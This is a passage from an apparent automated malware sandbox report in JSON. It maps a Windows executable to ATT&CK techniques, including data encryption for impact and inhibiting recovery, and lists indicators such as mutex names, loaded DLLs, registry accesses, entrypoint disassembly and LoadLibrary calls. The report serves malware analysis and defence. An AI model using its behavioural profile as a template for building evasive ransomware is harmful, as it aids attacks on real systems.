"https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Inhibit System Recovery", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490", "malicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74CA0000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74860000\n \"WMIC.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74CA0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\hjsdjsjfsauy2y8727\"\n \"Local\\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000\"\n \"Local\\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511\"\n \"hjsdjsjfsauy2y8727\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched \"WBEM Locator\" (Path: \"HKCU\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")\n \"WMIC.exe\" touched \"Free Threaded XML DOM Document\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{F6D90F12-9C73-11D3-B32E-00C04F990BB4}\")\n \"WMIC.exe\" touched \"Microsoft WBEM WbemClassObject Marshalling proxy\" (Path: \"HKCU\\CLSID\\{4590F812-1D3A-11D0-891F-00AA004B2E24}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A69857.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" file has an entrypoint instructions - \"call\t0x41cdb9,jmp\t0x41c75d,push\tebp,mov\tebp, esp,test\tbyte ptr [ebp + 8], 1,push\tesi,mov\tesi, ecx,mov\tdword ptr [esi], 0x4281d0,je\t0x41c8ff,push\t0xc,push\tesi,call\t0x41c3f0,pop\tecx,pop\tecx,mov\teax, esi,pop\tesi,pop\tebp,ret\t4,push\tebp,mov\tebp, esp,push\tesi,push\tdword ptr [ebp + 8],mov\tesi, ecx,call\t0x41c093,mov\tdword ptr [esi], 0x4281d8,mov\teax, esi,pop\tesi,pop\tebp,ret\t4,and\tdword ptr [ecx + 4], 0,mov\teax, ecx,and\tdword ptr [ecx + 8], 0,mov\tdword ptr [ecx + 4], 0x4281e0,mov\tdword ptr [ecx], 0x4281d8,ret\t,push\tebp,mov\tebp, esp,\"\n \"DISMHOST.EXE.67A69857.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"OLEAUT32.DLL\" at base 75e40000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f50000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"KERNEL32\" at base 75a40000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1c0000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"NETAPI32.DLL\" at base 738b0000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"IPHLPAPI.DLL\" at base 734d0000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"SHLWAPI.DLL\" at base 754c0000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"SHELL32.DLL\" at base 763f0000\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"KERNEL32.DLL\" at base 75a40000\n \"cmd.exe\" loaded module \"KERNEL32.DLL\" at base 75a40000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f50000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WMIC.exe\" loaded module \"KERNEL32\" at base 75a40000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WMIC.exe\" loaded module \"ADVAPI32.DLL\" at base 75b20000\n \"WMIC.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75580000\n \"WMIC.exe\" loaded module \"CLBCATQ.DLL\" at base 77410000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75a40000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6d2a0000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\KERNEL32.DLL\" at base 75a40000\n \"WMIC.exe\" loaded module \"KERNEL32.DLL\" at base 75a40000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSXML3.DLL\" at base 69ff0000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 752e0000\n \"WMIC.exe\" loaded module \"URLMON.DLL\" at base 75640000\n \"WMIC.exe\" loaded module \"WININET.DLL\" at base 76090000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 751b0000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73fe0000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 71e20000\n \"WMIC.exe\" loaded module \"CRYPTSP.DLL\" at base 74b90000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74920000\n \"WMIC.exe\" loaded module \"CRYPTBASE.DLL\" at base 75080000\n \"WMIC.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75120000\n \"WMIC.exe\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\MSOXMLMF.DLL\" at base 6b6f0000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6ced0000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6d6b0000\n \"WMIC.exe\" loaded module \"OLEAUT32.DLL\" at base 75e40000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f50000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75a40000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSXML3.DLL\" at base 69eb0000\n \"WMIC.exe\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\MSOXMLMF.DLL\" at base 6b420000\n \"WMIC.exe\" loaded module \"RPCRT4.DLL\" at base 76340000\n \"WMIC.exe\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\MSOXMLMF.DLL\" at base 6ca80000\n \"WMIC.exe\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\MSOXMLMF.DLL\" at base 74020000\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1c0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter OleAut32.dll (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter Netapi32.dll (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter Shlwapi.dll (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter Shell32.dll (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"LoadLibrary\" with a parameter Kernel32.dll (UID: 00000000-00005716)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\kernel32.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005348)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003036)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003036)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003036)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003036)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\kernel32.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\kernel32.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\kernel32.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000312)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000860)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000860)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000860)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000860)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\kernel32.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003424)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005880)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005880)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005880)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005880)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\kernel32.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002948)\n 